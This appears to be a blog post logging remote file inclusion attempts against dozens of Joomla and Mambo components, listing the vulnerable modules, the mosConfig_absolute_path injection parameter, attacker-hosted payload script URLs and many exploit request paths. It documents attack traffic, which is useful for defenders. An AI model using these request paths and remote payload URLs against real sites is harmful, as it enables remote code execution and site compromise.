Found vuln requested mosConfig_absolute_path injection 03-04-08

Script Name:
AutoStand (Joomla module)
Carousel Flash Image Gallery (Joomla module)
Coppermine Photo Gallery component (Mambo module)
CropImage (Mambo module)
ExtCalendar (Mambo module)
FlatMenu (Mambo module)
JoomlaPack (Joomla module)
MOSMedia Lite (Mambo module)
NFN Address Book (Mambo module)
swMenuFree (Mambo module)
TaskHopper (Joomla module)
Tour De France Pool (Joomla module)
VisoHotlink
zOOm Media Gallery
?

Parameters used for code injection attempts:
mosConfig_absolute_path=

Script injection:

http://www.smagz.com/jim.do??
http://www.j-vision.co.kr/company/rhe/boo.do???
http://www.smagz.com/bo.do??

Url requested:
/index.php?option=com_a6mambohelpdesk&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_autolinks&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_bannersmanager&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_battleships&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_bbclone&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_calendar&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_careerb_rss_feeds&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_colophon&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_colorlab&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_command&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_contact&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_contribs&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_coravideo&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_cpg&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_cropimage&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_dmuploader&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_dutjobdatabase&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_dwodp&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_easyfaq&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_easyfaq&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_easygallery&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_fabrik&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_fbfeed&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_feedgator&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_gcalendar&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_hashcash&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jcalpro&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jce&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jcs&task=add&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jd-wiki&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jfcei&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jjgallery&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jomcomment&task=trackback&id=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_joomla-visites&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_joomla_flash_uploader&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_joomlacloud&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_login&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_mamml&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_mmp&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_mosforms&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_mycontent&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_pccookbook&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_productbook&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_quiz&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_quiz&task=take&catid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_simpleblog&task=userview&userid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_sociolize&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_swmenumaker&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_swmenupro&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_trash&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_userlist_xtd&Itemid=&mosConfig_absolute_path=
----------------------------------------------------------------------
/index.php?option=com_webhosting&Itemid=&mosConfig_absolute_path=
Found vuln requested mosConfig_absolute_path injection 03-04-08 Found vuln requested mosConfig_absolute_path injection 03-04-08 Reviewed by Furkan Samadha on 10:27 PM Rating: 5